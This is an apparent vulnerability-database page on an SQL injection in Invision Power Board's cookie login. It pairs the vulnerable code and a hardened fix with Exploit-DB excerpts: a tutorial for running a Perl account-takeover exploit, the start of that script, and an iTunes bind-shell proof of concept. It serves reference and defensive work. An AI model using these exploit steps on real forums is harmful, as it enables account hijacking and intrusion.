CVE-2005-1598
Published 2005-05-16
Priority: P349 (high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 13.91% (96.1 percentile)
SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie password hash (pass_hash) that modifies the internal $pid variable.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_power_board | — | — |
No detection rules found.
Exploit-DB
Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities
exploitdb·2015-05-05·CVSS 4.3
CVE-2005-1597 [MEDIUM] Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities

```php
member['id'] )
{
    $mid = intval($std->my_getcookie('member_id'));
    $pid = $std->my_getcookie('pass_hash');
    If ($mid and $pid)
    {
        $DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");
        if ( $member = $DB->fetch_row() )
        {
            $ibforums->member     = $member;
            $ibforums->session_id = "";
            $std->my_setcookie('session_id','0', -1 );
        }
    }
}
```
This particular portion of code is from the IPB 1.* series, but the vulnerability seems to exist on all versions of IPB (both the 1.* and 2.* series). Anyway, as we can see from the above code the variable $mid is properly forced into an integer datatype and as a result is safe to pass to the query, but what about $pid? In the above code we see that the value of $pid is returned from the my_getcookie() function with
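For contrast with the excerpt above, here is a hardened form of the same cookie auto-login check. This is an added example, not IPB code and not part of the GulfTech advisory: it assumes PDO is available and a table `ibf_members` with `id` and `password` columns as in the excerpt, and it assumes the stored hash is a 32-character lowercase hex string (an assumption the advisory does not state). The defensive points are that both cookie values are validated against a strict shape before any database work, the member row is fetched with a bound parameter so no cookie text is ever interpolated into SQL, and the hash comparison happens in PHP in constant time rather than in the WHERE clause.

```php
<?php
// Added example, not Invision Power Board code. Assumptions: PDO, an
// ibf_members table with id/password columns, and 32-hex-char password hashes.

function validate_cookie_credentials(string $memberIdCookie, string $passHashCookie): ?array
{
    // member_id: a positive integer of reasonable length, nothing else.
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $memberIdCookie)) {
        return null;
    }
    // pass_hash: exactly the shape a stored hash can have (assumed 32 hex chars).
    // Anything containing quotes, spaces or comment markers fails here.
    if (!preg_match('/^[0-9a-f]{32}$/', $passHashCookie)) {
        return null;
    }
    return ['id' => (int) $memberIdCookie, 'hash' => $passHashCookie];
}

function autologin_member(PDO $db, string $memberIdCookie, string $passHashCookie): ?array
{
    $creds = validate_cookie_credentials($memberIdCookie, $passHashCookie);
    if ($creds === null) {
        return null;
    }
    // Look the member up by id only, with a bound parameter: the cookie value
    // never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT * FROM ibf_members WHERE id = :id');
    $stmt->execute([':id' => $creds['id']]);
    $member = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($member === false) {
        return null;
    }
    // Compare the hash in PHP, in constant time, instead of in the WHERE clause.
    if (!hash_equals((string) $member['password'], $creds['hash'])) {
        return null;
    }
    return $member;
}

// Demonstration against an in-memory SQLite database with constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ibf_members (id INTEGER PRIMARY KEY, name TEXT, password TEXT)');
$storedHash = str_repeat('a', 32); // constructed placeholder hash
$db->exec("INSERT INTO ibf_members VALUES (2, 'alice', '$storedHash')");

// A matching member_id / pass_hash pair returns the member row.
$member = autologin_member($db, '2', $storedHash);
echo $member !== null ? "login accepted for {$member['name']}\n" : "login rejected\n";

// A pass_hash that is not a well-formed hash is rejected before any query runs.
$rejected = autologin_member($db, '2', "' OR 1=1 /*");
echo $rejected === null ? "malformed pass_hash rejected\n" : "unexpected login\n";

// A well-formed hash that does not match the stored one is also rejected.
$wrong = autologin_member($db, '2', str_repeat('b', 32));
echo $wrong === null ? "wrong hash rejected\n" : "unexpected login\n";
```

Validating the cookie shape up front is what removes the root cause here: with `$pid` restricted to hex characters there is no value it can take that changes the meaning of the query, and the bound parameter makes that true even if the validation regex were later loosened. Fetching by id and comparing in PHP also means a query-level mistake can at worst return the wrong row, never authenticate an unknown hash.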
Exploit-DB
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
exploitdb·2005-05-27
CVE-2005-1598 Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
---
# danica jones
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at
C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt
Add the following entries:
forums.example.com FALSE / FAL
Exploit-DB
Invision Power Board 2.0.3 - 'login.php' SQL Injection
exploitdb·2005-05-26
CVE-2005-1598 Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection
---
```perl
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $
```
Exploit-DB
Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb·2005-01-16
CVE-2005-0043 Apple iTunes - Playlist Parsing Local Buffer Overflow
Apple iTunes - Playlist Parsing Local Buffer Overflow
---
```c
/*
 * PoC for iTunes on OS X 10.3.7
 * -( [email protected] )-
 *
 * Generates a .pls file, when loaded in iTunes it
 * binds a shell to port 4444.
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( [email protected] )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$ open foo.pls
 * -[nemo@gir:~]$ nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 *
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */
#include
#include
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
```
No writeups or analysis indexed.
References:
- http://forums.invisionpower.com/index.php?showtopic=168016
- http://marc.info/?l=bugtraq&m=111539908705851&w=2
- http://marc.info/?l=bugtraq&m=111712587206834&w=2
- http://secunia.com/advisories/15265
- http://securitytracker.com/id?1013907
- http://securitytracker.com/id?1014499
- http://www.gulftech.org/?node=research&article_id=00073-05052005
- http://www.osvdb.org/16297
- http://www.securiteam.com/exploits/5GP0E2KFQQ.html
- http://www.securityfocus.com/bid/13529
- https://exchange.xforce.ibmcloud.com/vulnerabilities/20446
- https://www.exploit-db.com/exploits/1013